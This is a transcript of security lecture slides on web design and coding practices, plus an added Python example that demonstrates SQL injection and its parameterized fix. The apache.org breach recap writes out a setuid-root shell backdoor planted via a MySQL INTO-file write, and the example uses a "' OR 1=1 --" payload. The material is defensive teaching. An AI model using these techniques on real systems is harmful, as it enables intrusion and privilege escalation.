Security and Web Programming/Design. cell phones bio-facilities Sodas, junk food, and coffee Welcome to the No Smoking State.

Presentation transcript:

Security and Web Programming/Design

cell phones bio-facilities Sodas, junk food, and coffee Welcome to the No Smoking State

who are you? where are you from? what do you do? Emacs or vi?

Warm Fuzzies Secure Design and Implementation Wordage

Security Concepts Vetting Software Design Strategy Developer practices Coding Practices Operational Practices

Security Concepts

trust transitive trust

principle of least privilege enumerating badness “best block: not be there” -- Mr. Miyagi

“defense in depth”

threats vulnerabilities risks

who accepts the risk?

being paranoid

confidentiality integrity availability

protect what you can detect what you can’t prevent

hammers, nails...

a security mechanism is designed to protect against a specific, finite set of attacks. It usually fails gloriously when modified or used for other purposes.

don’t design your own new security protocol

the law of unintended consequences

don’t rely on the environment for protection don’t rely on good behavior don’t rely on things you can’t control

how apache.org got pwn3d

ftproot == wwwroot webuser == o+w

upload php via ftp upload backdoor code compile and execute via http c+-o+httpd+httpd.c voila! shell on web server

bugzilla talking to mysql mysql running as root mysql username/password stored in a script

create table with text field
insert:
  #!/bin/sh
  cp /bin/sh /tmp/.rootsh
  chmod 4755 /tmp/.rootsh
  rm -f /root/.tcshrc
query: SELECT... INTO ‘/root/.tcshrc’
wait for someone to “su -”

Security Vetting

What is it supposed to do? How does it work? What side effects are there? How is it deployed and maintained?

How does it fail? What is the risk? Can it be mitigated?

usability and security

understanding caring under-budget

security is an enabling task

It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily. -- Eric S. Raymond, The Art of Unix Usability

Design Strategy

top down design

goals requirements design review

what is the end result? what problem is it trying to solve? *not* how it is implemented

security usability performance environmental

support deployment political external

as simple as possible to meet the requirements add requirements if apparent during design be prepared to change when requirements can’t be met

for each security control what threat is addressed? Really?

recent examples

Developer Practices

The three virtues of a programmer are laziness, impatience, and hubris. -- Larry Wall

Group permissions and accounts Code Safety Test Environment Regression Testing

Coding Practices

bounds checking input validation no client-side trust error checking

sql injection cross-site scripting credential handling data mapping logging
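The “sql injection” and “input validation” bullets above, shown as a worked example added here (not part of the lecture slides): a constructed in-memory bug-tracker table in Python's sqlite3, with the string-spliced query that lets user text rewrite the WHERE clause next to the parameterized query that binds the same text as data. The table, its rows and the injected input are all made up for the demonstration.

```python
import sqlite3

# Constructed stand-in for a bug tracker database: the application is only
# supposed to show titles of bugs that are not marked private.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE bugs (id INTEGER PRIMARY KEY, title TEXT, private INTEGER)"
    )
    con.executemany(
        "INSERT INTO bugs (title, private) VALUES (?, ?)",
        [
            ("login page XSS", 0),
            ("ftp root equals web root", 1),  # restricted report
            ("mysql running as root", 1),     # restricted report
        ],
    )
    con.commit()
    return con


def search_vulnerable(con, term):
    # Bug: the user's text is spliced straight into the SQL, so a quote in
    # the input ends the string literal and the rest becomes SQL syntax.
    sql = "SELECT title FROM bugs WHERE private = 0 AND title LIKE '%" + term + "%'"
    return [row[0] for row in con.execute(sql)]


def search_safe(con, term):
    # Fix: the placeholder binds the term as data, so the statement's shape
    # is fixed at coding time and no input can change the WHERE clause.
    sql = "SELECT title FROM bugs WHERE private = 0 AND title LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + term + "%",))]


# Constructed input: closes the literal, ORs in a true condition, and turns the
# trailing "%'" of the original query into an SQL comment.
INJECTED = "' OR 1=1 --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, INJECTED))  # leaks private rows
    print("safe:      ", search_safe(db, INJECTED))        # nothing matches
```

Parameterization fixes the query-shape problem only; the apache.org story also needed the database daemon to run as root with credentials lying in a script, which is a least-privilege failure that no query rewriting addresses.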

don’t require shell for remote execution

Operational Practices

Server accounts and permissions handling credentials accountability software maintenance documentation testing and debugging